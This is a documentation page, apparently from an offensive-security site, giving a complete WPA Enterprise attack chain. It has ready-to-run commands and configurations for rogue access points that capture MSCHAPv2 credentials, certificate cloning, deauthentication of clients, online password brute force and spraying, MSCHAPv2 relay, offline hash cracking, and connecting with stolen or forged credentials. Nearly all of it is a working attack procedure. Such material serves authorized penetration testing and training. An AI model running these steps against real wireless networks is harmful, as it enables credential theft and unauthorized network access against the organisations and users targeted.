> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# WPA Enterprise

> Complete WPA Enterprise attack chain: rogue AP credential capture (manual and automated), online brute force, MSCHAPv2 relay, and post-capture cracking.

## Overview

WPA Enterprise authenticates users via 802.1X/RADIUS. Attacks target the authentication exchange itself: lure clients to a rogue AP, capture their MSCHAPv2 hashes or relay the challenge directly, then crack or relay to gain access.

Attack flow:

```
Recon → Rogue AP → Deauth → Capture credentials → Crack / Relay
```

***

## Attack 1. Rogue AP (Credential Capture)

Clients that don't validate the server certificate connect to the rogue AP and expose their MSCHAPv2 challenge/response.

***

### Manual (hostapd-mana)

**Step 1: Generate FreeRADIUS certificates:**

```bash theme={"dark"}
sudo apt install freeradius freeradius-utils
cd /etc/freeradius/3.0/certs
nano ca.cnf      # set country, org, CN
nano server.cnf  # set server details
rm dh && make
```

**Step 2: EAP user file** (`/etc/hostapd-mana/mana.eap_user`):

```
*    PEAP,TTLS,TLS,FAST
"t"  TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "pass"  [2]
```

**Step 3: hostapd-mana config** (`network.conf`):

```
ssid=<TARGET-SSID>
interface=<INTERFACE>
driver=nl80211
channel=<CHANNEL>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
```

**Step 4: Launch:**

```bash theme={"dark"}
sudo hostapd-mana network.conf
```

Credentials written to `/tmp/hostapd.credoutfile`.

***

### Tool (eaphammer)

**Step 1: Generate self-signed certificate:**

```bash theme={"dark"}
cd ~/tools/eaphammer
python3 ./eaphammer --cert-wizard
```

**Step 2: Launch rogue AP:**

```bash theme={"dark"}
python3 ./eaphammer -i wlan1 \
  --auth wpa-eap \
  --essid <TARGET-SSID> \
  --creds \
  --negotiate balanced
```

***

### Deauth (both approaches)

Force clients off the real AP to trigger reconnection to the rogue:

```bash theme={"dark"}
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 -a <BSSID> wlan0mon -c <CLIENT-MAC>
```

***

## Attack 2. Rogue AP with Cloned Certificate

When clients validate the server certificate, the rogue AP must present the real certificate to be trusted. Requires the CA and server cert obtained during recon.

***

### Manual (berate\_ap)

Convert certs to PEM and generate DH:

```bash theme={"dark"}
openssl x509 -in ca.crt     -out hostapd.ca.pem   -outform PEM
openssl x509 -in server.crt -out hostapd.cert.pem  -outform PEM
openssl rsa  -in server.key -out hostapd.key.pem
openssl dhparam -out hostapd.dh.pem 2048
```

Launch rogue AP with custom cert path:

```bash theme={"dark"}
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
  --mana-credout output.log \
  --eap-cert-path /path/to/certs/ \
  wlan1 lo <TARGET-SSID>
```

***

### Tool (eaphammer)

Import the real certificate:

```bash theme={"dark"}
python3 ./eaphammer --cert-wizard import \
  --server-cert /path/to/server.crt \
  --ca-cert /path/to/ca.crt \
  --private-key /path/to/server.key \
  --private-key-passwd whatever
```

Launch rogue AP (same command as Attack 1):

```bash theme={"dark"}
python3 ./eaphammer -i wlan1 \
  --auth wpa-eap \
  --essid <TARGET-SSID> \
  --creds \
  --negotiate balanced
```

***

## Attack 3. Online Brute Force (air-hammer)

When a valid username is known (from recon), brute force their password directly against the live AP.

Brute force single user:

```bash theme={"dark"}
cd ~/tools/air-hammer
echo 'DOMAIN\username' > target.user
./air-hammer.py -i wlan1 -e <SSID> -p ~/rockyou-top100000.txt -u target.user
```

Password spray across multiple users:

```bash theme={"dark"}
cat ~/usernames.txt | awk '{print "DOMAIN\\" $1}' > ~/domain-users.txt
./air-hammer.py -i wlan1 -e <SSID> -P <PASSWORD> -u ~/domain-users.txt
```

***

## Attack 4. MSCHAPv2 Relay (wpa\_sycophant)

Relay the victim's MSCHAPv2 challenge/response to the real AP, authenticates as the victim without knowing the password.

**Step 1: Set rogue AP MAC:**

```bash theme={"dark"}
systemctl stop network-manager
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up
```

**Step 2: wpa\_sycophant config:**

```
network={
  ssid="<TARGET-SSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity=""
  anonymous_identity=""
  password=""
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
  bssid_blacklist=F0:9F:C2:00:00:00
}
```

**Shell 1: Rogue AP:**

```bash theme={"dark"}
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
  --mana-credout output.log \
  wlan1 lo <TARGET-SSID>
```

**Shell 2: Deauth target client:**

```bash theme={"dark"}
airmon-ng start wlan0
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
```

**Shell 3: Start relay:**

```bash theme={"dark"}
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan2
```

**Shell 4: Get IP:**

```bash theme={"dark"}
dhclient wlan2 -v
```

If relay fails, change `phase1`:

```
phase1="peapver=1"
```

***

## Cracking Captured Hashes

**hashcat** (mode 5500: MSCHAPv2):

```bash theme={"dark"}
# From eaphammer log
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500

# Crack
hashcat -a 0 -m 5500 hashcat.5500 ~/rockyou.txt --force
```

**hashcat** (mode 5600: NTLMv2 from hostile portal):

```bash theme={"dark"}
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force
```

**asleap** (from challenge/response pair):

```bash theme={"dark"}
asleap -C <CHALLENGE> -R <RESPONSE> -W ~/rockyou.txt
```

***

## Authenticating with Obtained Credentials

### PEAP/MSCHAPv2 (cracked password)

`wpa-corp.conf`:

```
network={
    ssid="<TARGET-SSID>"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="DOMAIN\username"
    password="<CRACKED-PASSWORD>"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
```

```bash theme={"dark"}
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -Dnl80211 -i <INTERFACE> -c wpa-corp.conf
sudo dhclient <INTERFACE> -v
```

***

### EAP-TLS (client certificate from obtained CA)

Generate client certificate using the real CA:

```bash theme={"dark"}
openssl genrsa -out client.key 2048
openssl req -config client.conf -new -key client.key -out client.csr
openssl x509 -days 730 -extfile client.ext \
  -CA ca.crt -CAkey ca.key -CAserial ca.serial \
  -in client.csr -req -out client.crt
```

`wpa-tls.conf`:

```
network={
    ssid="<TARGET-SSID>"
    scan_ssid=1
    mode=0
    proto=RSN
    key_mgmt=WPA-EAP
    auth_alg=OPEN
    eap=TLS
    identity="DOMAIN\username"
    ca_cert="./ca.crt"
    client_cert="./client.crt"
    private_key="./client.key"
    private_key_passwd="whatever"
}
```

```bash theme={"dark"}
sudo wpa_supplicant -Dnl80211 -i <INTERFACE> -c wpa-tls.conf
sudo dhclient <INTERFACE> -v
```
